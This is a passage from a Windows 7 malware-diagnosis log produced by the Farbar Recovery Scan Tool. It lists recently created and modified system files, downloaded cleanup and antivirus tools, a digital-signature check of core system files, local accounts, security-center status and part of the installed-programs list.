Corporation) C:\Windows\system32\ntdll.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 03649536 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00877056 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00006656 _____ (Microsoft Corporation) 
C:\Windows\system32\apisetschema.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003584 ____H (Microsoft Corporation) 
C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:18 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe 2016-11-09 15:50 - 2016-10-07 10:18 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe 2016-11-09 
15:50 - 2016-10-07 10:15 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 02291712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00581632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleaut32.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll 2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll 
2016-11-09 15:50 - 2016-10-07 10:12 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:12 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 10:04 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-11-09 15:50 - 2016-10-07 10:04 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-11-09 15:50 - 2016-10-07 10:04 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-11-09 15:50 - 2016-10-07 10:01 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-11-09 15:50 - 2016-10-07 10:00 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-11-09 15:50 - 2016-10-07 09:56 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-11-09 15:50 - 2016-10-07 09:50 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-11-09 15:50 - 2016-10-07 09:50 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-11-09 15:50 - 2016-10-07 09:50 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-11-09 15:50 - 2016-10-07 09:50 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-11-09 15:50 - 2016-10-07 09:49 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 09:49 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 09:49 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-11-09 15:50 - 2016-10-07 09:49 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-11-09 15:50 - 2016-10-05 09:54 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bowser.sys
2016-11-09 15:50 - 2016-09-15 09:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-11-09 15:50 - 2016-09-13 10:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-11-09 15:50 - 2016-09-13 10:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-11-09 15:50 - 2016-09-09 13:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-11-09 15:50 - 2016-09-09 13:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-11-09 15:49 - 2016-08-22 11:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-11-08 20:20 - 2016-11-08 20:20 - 01694784 _____ (PassMark Software ) C:\Users\cjerald\Downloads\diskcheckup.exe
2016-11-08 20:20 - 2016-11-08 20:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DiskCheckup
2016-11-08 20:20 - 2016-11-08 20:20 - 00000000 ____D C:\Program Files (x86)\DiskCheckup
2016-11-08 15:54 - 2016-12-01 03:43 - 00000988 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LogMeIn Control Panel.lnk
2016-11-08 15:53 - 2016-11-08 15:54 - 00000000 ____D C:\Program Files (x86)\LogMeIn
2016-11-08 15:53 - 2016-11-08 15:53 - 00000000 ____D C:\Users\cjerald\AppData\Local\LogMeIn
2016-11-08 15:53 - 2016-10-12 13:31 - 00122400 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll
2016-11-08 15:53 - 2016-10-12 13:31 - 00107520 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIinit.dll
2016-11-08 15:53 - 2016-01-29 11:53 - 00035328 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIport.dll
2016-11-08 15:53 - 2013-12-10 15:15 - 00107368 _____ (LogMeIn, Inc.) C:\Windows\system32\LMIRfsClientNP.dll.000.bak
2016-11-08 15:53 - 2013-11-05 16:45 - 00072216 _____ (LogMeIn, Inc.) C:\Windows\system32\Drivers\LMIRfsDriver.sys
2016-11-08 15:51 - 2016-11-08 15:51 - 20489480 _____ C:\Users\cjerald\Downloads\LogMeIn.exe
2016-11-02 10:51 - 2016-11-15 13:02 - 18068701 _____ C:\Users\cjerald\AppData\Local\census.cache
2016-11-02 10:51 - 2016-11-15 10:31 - 00882323 _____ C:\Users\cjerald\AppData\Local\ars.cache
2016-11-02 10:50 - 2016-11-15 02:28 - 00000010 _____ C:\Users\cjerald\AppData\Local\sponge.last.runtime.cache
2016-11-02 10:39 - 2016-11-02 10:39 - 00000000 ____D C:\Windows\Trend Micro
2016-11-02 10:39 - 2016-11-02 10:39 - 00000000 ____D C:\ProgramData\Trend Micro
2016-11-02 10:38 - 2016-11-02 10:38 - 02527376 _____ (Trend Micro Inc.) C:\Users\cjerald\Downloads\HousecallLauncher64.exe
2016-11-02 10:38 - 2016-11-02 10:38 - 00000036 _____ C:\Users\cjerald\AppData\Local\housecall.guid.cache
2016-11-02 10:32 - 2016-11-18 19:25 - 00181160 _____ C:\Windows\ntbtlog.txt
2016-11-02 10:25 - 2016-11-02 10:25 - 00144778 _____ C:\Users\cjerald\Downloads\cc_20161102_112336.reg
2016-11-02 10:18 - 2016-11-02 10:18 - 00002784 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2016-11-02 10:18 - 2016-11-02 10:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-11-02 10:18 - 2016-11-02 10:18 - 00000000 ____D C:\Program Files\CCleaner
2016-11-02 09:55 - 2016-11-02 09:55 - 00000000 ____D C:\Users\cjerald\AppData\Roaming\AVAST Software
2016-11-02 09:54 - 2016-11-02 09:54 - 00391496 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2016-11-02 09:54 - 2016-11-02 09:54 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-11-02 09:54 - 2016-11-02 09:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2016-11-02 09:53 - 2016-11-02 10:31 - 00000000 ____D C:\ProgramData\AVAST Software
2016-11-02 09:53 - 2016-11-02 09:59 - 00000000 ____D C:\Program Files\AVAST Software
2016-11-02 09:53 - 2016-11-02 09:53 - 06253640 _____ (AVAST Software) C:\Users\cjerald\Downloads\avast_free_antivirus_setup_online_cnet_1.exe
2016-11-02 09:53 - 2016-11-02 09:53 - 00053208 _____ (AVAST Software) C:\Windows\avastSS.scr
2016-11-01 12:21 - 2016-11-01 12:21 - 05658651 ____R (Swearware) C:\Users\cjerald\Downloads\ComboFix.exe
2016-11-01 11:53 - 2016-11-19 15:53 - 00000000 ____D C:\Program Files (x86)\Slimjet
2016-11-01 11:53 - 2016-11-01 11:53 - 00000000 ____D C:\Users\cjerald\AppData\Local\Slimjet
2016-11-01 11:53 - 2016-11-01 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashPeak Slimjet

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-12-01 04:40 - 2009-07-13 23:45 - 00022096 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2016-12-01 04:40 - 2009-07-13 23:45 - 00022096 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2016-12-01 04:36 - 2015-06-05 11:31 - 00000670 _____ C:\Windows\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job
2016-12-01 04:36 - 2014-02-03 15:59 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-12-01 04:30 - 2015-02-24 13:15 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-12-01 04:26 - 2014-02-03 15:59 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-12-01 04:25 - 2013-12-17 12:00 - 00000112 _____ C:\Windows\system32\config\netlogon.ftl
2016-12-01 04:16 - 2014-02-03 15:59 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2016-12-01 03:46 - 2013-12-17 09:58 - 00000000 ____D C:\ProgramData\LogMeIn
2016-12-01 03:43 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-12-01 03:42 - 2013-12-12 13:16 - 00000000 ____D C:\ProgramData\NVIDIA
2016-12-01 03:25 - 2009-07-13 22:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2016-12-01 02:43 - 2014-03-11 14:03 - 00000574 _____ C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148.job
2016-12-01 02:19 - 2013-12-17 15:29 - 00003914 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{6EA3AC3A-126A-4AFB-8EF2-29F1B0AD6D53}
2016-11-30 04:42 - 2013-12-17 12:02 - 00000000 ____D C:\Users\cjerald
2016-11-23 05:39 - 2009-07-14 00:08 - 00032580 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-11-21 12:26 - 2009-07-14 00:32 - 00000000 ____D C:\Windows\system32\FxsTmp
2016-11-21 02:03 - 2015-05-05 11:13 - 00000000 ____D C:\Users\cjerald\AppData\LocalLow\Temp
2016-11-19 20:23 - 2015-06-05 11:31 - 00003690 _____ C:\Windows\System32\Tasks\G2MUploadTask-S-1-5-21-3320201264-2921037059-4171379232-1148
2016-11-19 20:23 - 2014-03-11 14:03 - 00003594 _____ C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3320201264-2921037059-4171379232-1148
2016-11-19 16:14 - 2015-02-24 13:15 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-11-18 19:16 - 2009-07-14 00:37 - 00000000 ____D C:\Windows\DigitalLocker
2016-11-18 15:39 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\TAPI
2016-11-18 15:36 - 2015-04-16 07:28 - 00000000 ____D C:\Windows\system32\appraiser
2016-11-18 15:36 - 2014-05-06 18:09 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-11-18 15:21 - 2009-07-14 00:13 - 00785942 _____ C:\Windows\system32\PerfStringBackup.INI
2016-11-18 15:21 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\inf
2016-11-17 10:37 - 2014-07-24 12:50 - 00000000 ____D C:\Users\cjerald\AppData\Local\ElevatedDiagnostics
2016-11-16 22:13 - 2015-11-25 13:59 - 00000000 ____D C:\Program Files (x86)\Backblaze
2016-11-16 21:18 - 2013-12-17 12:11 - 00000000 ____D C:\Users\clayton
2016-11-16 14:14 - 2014-10-19 10:08 - 00000000 ____D C:\Users\cjerald\AppData\Local\CrashDumps
2016-11-16 10:52 - 2014-02-03 15:59 - 00000000 ____D C:\Users\cjerald\AppData\Local\Google
2016-11-16 08:05 - 2013-12-17 15:38 - 00000000 ____D C:\ProgramData\Oracle
2016-11-16 07:53 - 2013-12-17 15:38 - 00269888 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2016-11-16 02:34 - 2013-12-17 12:26 - 00177752 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2016-11-16 02:34 - 2013-12-17 12:26 - 00008222 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
2016-11-16 02:34 - 2013-12-17 12:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Symantec Endpoint Protection
2016-11-16 02:32 - 2013-12-17 12:24 - 00577392 _____ (Symantec Corporation) C:\Windows\system32\SymVPN.dll
2016-11-16 02:32 - 2013-12-17 12:24 - 00421232 _____ (Symantec Corporation) C:\Windows\SysWOW64\SymVPN.dll
2016-11-16 02:32 - 2013-12-17 12:24 - 00158576 _____ (Symantec Corporation) C:\Windows\system32\FwsVpn.dll
2016-11-16 02:32 - 2013-12-17 12:24 - 00155472 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SysPlant.sys
2016-11-16 02:32 - 2013-12-17 12:24 - 00136560 _____ (Symantec Corporation) C:\Windows\SysWOW64\FwsVpn.dll
2016-11-16 02:32 - 2013-12-17 12:24 - 00045088 _____ (Symantec Corporation) C:\Windows\system32\Drivers\WGX64.SYS
2016-11-14 20:42 - 2014-02-03 16:00 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-14 19:07 - 2015-09-18 09:44 - 00000000 ____D C:\Qoobox
2016-11-14 19:03 - 2009-07-13 21:34 - 00000215 _____ C:\Windows\system.ini
2016-11-14 18:09 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\Registration
2016-11-14 17:47 - 2009-07-14 00:09 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-11-14 13:00 - 2013-12-12 12:40 - 00000000 ____D C:\Program Files\Intel
2016-11-10 12:56 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\rescache
2016-11-10 07:57 - 2009-07-13 23:45 - 00402552 _____ C:\Windows\system32\FNTCACHE.DAT
2016-11-09 17:30 - 2013-12-12 13:52 - 00000000 ____D C:\Windows\system32\MRT
2016-11-09 17:08 - 2013-12-12 13:52 - 141011376 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-11-08 20:33 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\PLA
2016-11-08 20:12 - 2013-12-12 13:03 - 00000000 ____D C:\Drivers & Utilities
2016-11-08 15:54 - 2013-12-17 09:58 - 00001024 _____ C:\.rnd
2016-11-02 10:22 - 2013-12-11 21:00 - 00000000 ____D C:\Windows\Panther
2016-11-02 09:54 - 2016-04-13 13:28 - 00000000 ____D C:\Program Files\Common Files\AV
2016-11-01 11:32 - 2015-02-24 13:15 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-11-01 10:23 - 2015-02-24 13:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware

==================== Files in the root of some directories =======

2016-11-02 10:51 - 2016-11-15 10:31 - 0882323 _____ () C:\Users\cjerald\AppData\Local\ars.cache
2016-11-02 10:51 - 2016-11-15 13:02 - 18068701 _____ () C:\Users\cjerald\AppData\Local\census.cache
2016-11-02 10:38 - 2016-11-02 10:38 - 0000036 _____ () C:\Users\cjerald\AppData\Local\housecall.guid.cache
2016-11-02 10:50 - 2016-11-15 02:28 - 0000010 _____ () C:\Users\cjerald\AppData\Local\sponge.last.runtime.cache
2014-03-12 18:30 - 2014-03-12 18:30 - 0000095 _____ () C:\ProgramData\SAH_Install.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-11-24 00:52

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016
Ran by cjerald (01-12-2016 04:42:16)
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Windows 7 Professional Service Pack 1 (X64) (2013-12-12 14:41:32)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-343821754-1919214937-3281495952-500 - Administrator - Disabled)
Guest (S-1-5-21-343821754-1919214937-3281495952-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)
AV: Symantec Endpoint Protection (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Symantec Endpoint Protection (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Acrobat X Pro (HKLM-x32\...\{AC76BA86-1033-0000-7760-000000000005}) (Version: 10.1.8 - Adobe Systems)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.162 - Adobe Systems Incorporated)
Backblaze (HKLM-x32\...\Backblaze) (Version: - Backblaze, Inc)
Canon MF Toolbox 4.9.1.1.mf09 (HKLM-x32\...\{6767DFEE-8909-453A-B553-C7693912B2EB}) (Version: 3.2.0 - Canon)
